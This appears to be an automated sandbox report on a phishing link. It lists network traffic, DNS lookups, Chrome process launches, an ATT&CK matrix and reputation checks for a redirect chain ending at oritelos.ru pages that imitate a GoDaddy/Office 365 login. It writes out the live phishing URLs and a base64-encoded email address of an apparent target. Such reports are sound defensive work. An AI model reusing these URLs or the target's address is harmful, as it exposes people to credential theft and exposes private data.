78NHLiPrbhh4WdYewpDR8A==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
              Source: global trafficHTTP traffic detected: GET /r/?id=hfffbb46%2Cc90b147%2Cc90b14f&jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475&p1=debssiebeads.co.ke/wp/ HTTP/1.1Host: t.email1.gct.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficDNS traffic detected: DNS query: t.email1.gct.com
              Source: global trafficDNS traffic detected: DNS query: debssiebeads.co.ke
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: f8gxf.oritelos.ru
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
              Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1135982147:1717061463:XHQuHvT4Va6wHyLXdOitYbqFIsyDOYHyVnGn1136xl8/88bdfe512e5d4301/f67bea3da7e6db1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2663sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: f67bea3da7e6db1sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 10:20:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IFfxEEvmd4bgv1rf9R0SUQesSlcBsdnMk0vaO8wl5VeKSAuB5bzqxCTNm4sZUsQA%2BYcYdivYdOBNPTUy3frQDVrngNbzCKpSy9qujj1nqbMQS9IrRLh7TvVAhmnExg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: HITAge: 4449Server: cloudflareCF-RAY: 88bdfe598bdf43f4-EWR
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 10:20:49 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: W0mpfwIt/ocEl4mh/VQEgA==$8DgnXjVCAj8XpkVHmfsW+g==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 88bdfe689d4e432e-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 10:20:53 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 9ZucDE6WLg4uudvQJENz+A==$c3SVAGGuGncXQTaWoek8Cw==Server: cloudflareCF-RAY: 88bdfe811dc31879-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 10:21:06 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: p0Bjouasp840d1nQCSd4Vw==$YY9gdYrkM/9LyMyqiUavUw==Server: cloudflareCF-RAY: 88bdfed16dd54402-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 10:21:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OXf2%2BKrnWdkLM%2Floc9n5vcpDxhlHHEIMX6h87JMpbllv0be%2FZMwknM62RYWAiFkb0A%2F6Ermi4aNZEQg%2F3E8sezwH5ByDRsBWjBM3oH3hZC83DY%2B2D1HdV8w1FvJgA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 88bdfedb78e80f95-EWR
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 10:21:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wl%2Faqn%2BESHa7SHqMjq3OZvf6PFn0srrY9bSWXN%2BNc2Y3XL3Q5JmGgZzVk020d%2FTb2Eb629Uc%2FPgURLwvoClWNIF7dcUUdSgAMbGcGhFfqrQikK3Is8o3ouaQCBalAQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 88bdff08cfa18c51-EWR
              Source: chromecache_109.2.drString found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js
              Source: chromecache_89.2.drString found in binary or memory: https://cloud.google.com/contact
              Source: chromecache_89.2.drString found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
              Source: chromecache_109.2.drString found in binary or memory: https://code.jquery.com/jquery-3.6.0.min.js
              Source: chromecache_89.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
              Source: chromecache_89.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
              Source: chromecache_89.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
              Source: chromecache_93.2.drString found in binary or memory: https://f8gxf.oritelos.ru/hIzc6w/#D
              Source: chromecache_89.2.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
              Source: chromecache_89.2.drString found in binary or memory: https://recaptcha.net
              Source: chromecache_109.2.drString found in binary or memory: https://sso.godaddy.com/v1/account/reset?app=o365&amp;realm=pass
              Source: chromecache_89.2.drString found in binary or memory: https://support.google.com/recaptcha
              Source: chromecache_89.2.drString found in binary or memory: https://support.google.com/recaptcha#6262736
              Source: chromecache_89.2.drString found in binary or memory: https://support.google.com/recaptcha/#6175971
              Source: chromecache_89.2.drString found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
              Source: chromecache_89.2.drString found in binary or memory: https://www.apache.org/licenses/
              Source: chromecache_109.2.drString found in binary or memory: https://www.godaddy.com/
              Source: chromecache_109.2.drString found in binary or memory: https://www.godaddy.com/legal/agreements/cookie-policy
              Source: chromecache_109.2.drString found in binary or memory: https://www.godaddy.com/legal/agreements/privacy-policy?target=_blank
              Source: chromecache_109.2.drString found in binary or memory: https://www.google.com/recaptcha/api.js
              Source: chromecache_89.2.dr, chromecache_66.2.drString found in binary or memory: https://www.google.com/recaptcha/api2/
              Source: chromecache_89.2.drString found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/DH3nyJMamEclyfe-nztbfV8S/recaptcha__.
              Source: chromecache_66.2.drString found in binary or memory: https://www.gstatic.com/recaptcha/releases/DH3nyJMamEclyfe-nztbfV8S/recaptcha__en.js
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: classification engineClassification label: mal80.phis.win@20/77@26/11
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1708,i,9045649938219728694,6714162670049641950,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://t.email1.gct.com/r/?id=hfffbb46%2Cc90b147%2Cc90b14f&jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475&p1=debssiebeads.co.ke/wp/#?email=aWFuLmhhbmNvY2tAYmFlc3lzdGVtcy5jb20="
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1708,i,9045649938219728694,6714162670049641950,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
              Process Injection
              1
              Process Injection
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1449494 URL: http://t.email1.gct.com/r/?... Startdate: 30/05/2024 Architecture: WINDOWS Score: 80 24 AI detected phishing page 2->24 26 Yara detected HtmlPhish62 2->26 28 Yara detected HtmlPhish10 2->28 30 4 other signatures 2->30 6 chrome.exe 1 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.4, 138, 443, 49493 unknown unknown 6->14 16 239.255.255.250 unknown Reserved 6->16 11 chrome.exe 6->11         started        process5 dnsIp6 18 f8gxf.oritelos.ru 188.114.96.3, 443, 49743, 49744 CLOUDFLARENETUS European Union 11->18 20 debssiebeads.co.ke 217.174.152.52, 443, 49740, 49741 TELEPOINTBG Bulgaria 11->20 22 11 other IPs or domains 11->22

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              http://t.email1.gct.com/r/?id=hfffbb46%2Cc90b147%2Cc90b14f&jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475&p1=debssiebeads.co.ke/wp/#?email=aWFuLmhhbmNvY2tAYmFlc3lzdGVtcy5jb20=0%VirustotalBrowse
              http://t.email1.gct.com/r/?id=hfffbb46%2Cc90b147%2Cc90b14f&jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475&p1=debssiebeads.co.ke/wp/#?email=aWFuLmhhbmNvY2tAYmFlc3lzdGVtcy5jb20=0%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
              https://developers.google.com/recaptcha/docs/faq#localhost_support0%URL Reputationsafe
              https://support.google.com/recaptcha#62627360%URL Reputationsafe
              https://support.google.com/recaptcha/?hl=en#62238280%URL Reputationsafe
              https://support.google.com/recaptcha/#61759710%URL Reputationsafe
              https://support.google.com/recaptcha0%URL Reputationsafe
              https://recaptcha.net0%URL Reputationsafe
              https://www.apache.org/licenses/0%URL Reputationsafe
              https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que0%URL Reputationsafe
              https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca0%URL Reputationsafe
              https://ipinfo.io/0%URL Reputationsafe
              https://cdn.socket.io/4.6.0/socket.io.min.js0%URL Reputationsafe
              https://www.godaddy.com/legal/agreements/privacy-policy?target=_blank0%Avira URL Cloudsafe
              https://sso.godaddy.com/v1/account/reset?app=o365&amp;realm=pass0%Avira URL Cloudsafe
              https://a.nel.cloudflare.com/report/v4?s=MoiSxzuww3vBWA14pxdaZRJmYA6faUxkXVbkS%2BCDvfvaNQNXJooN93SdQDTHpg0%2BmZp8f1%2B0jrwD15J9U1My48N1T9tY%2FXnsvCiFODAGhtnL2wxsIjGK2BQHa4ihAA%3D%3D0%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket0%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/ijadGOWmNjA7SxTV0q2ozi0cdBA9W0dAH33Z3eJlsCHRIWwOz561690%Avira URL Cloudsafe
              https://www.gstatic.c..?/recaptcha/releases/DH3nyJMamEclyfe-nztbfV8S/recaptcha__.0%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/klIQ39laQFjey0i6xGLP3ZDteNpdd3cDZBKGgtt891okNrKdibFlqrS1cZWOM1UJUDFXOGwYKo5Fyz2300%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/34HEkFr4q1WYO5T8k73FNznYijhCiUxn12JK891100%Avira URL Cloudsafe
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/88bdfe512e5d4301/1717064447602/jhAXgwYP39WVSiq0%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/12XCRnloHGipczcdhoCq689200%Avira URL Cloudsafe
              https://sso.godaddy.com/v1/account/reset?app=o365&amp;realm=pass0%VirustotalBrowse
              https://www.godaddy.com/legal/agreements/privacy-policy?target=_blank0%VirustotalBrowse
              https://f8gxf.oritelos.ru/hIzc6w/#D0%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/klpWKk32gxuOs7NipwmTvBAiwrwHsZdCtNCzija15cfNIJA8Jl2SAW0BE2ZBBrAhRNr49wx2200%Avira URL Cloudsafe
              https://debssiebeads.co.ke/wp/?jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=10614750%Avira URL Cloudsafe
              https://challenges.cloudflare.com/turnstile/v0/b/695da7821231/api.js0%Avira URL Cloudsafe
              https://challenges.cloudflare.com/turnstile/v0/b/695da7821231/api.js0%VirustotalBrowse
              https://cloud.google.com/contact0%Avira URL Cloudsafe
              https://f8gxf.oritelos.ru/23rACQ3TWSEp90OaR5XE1xy670%Avira URL Cloudsafe
              https://cloud.google.com/contact0%VirustotalBrowse
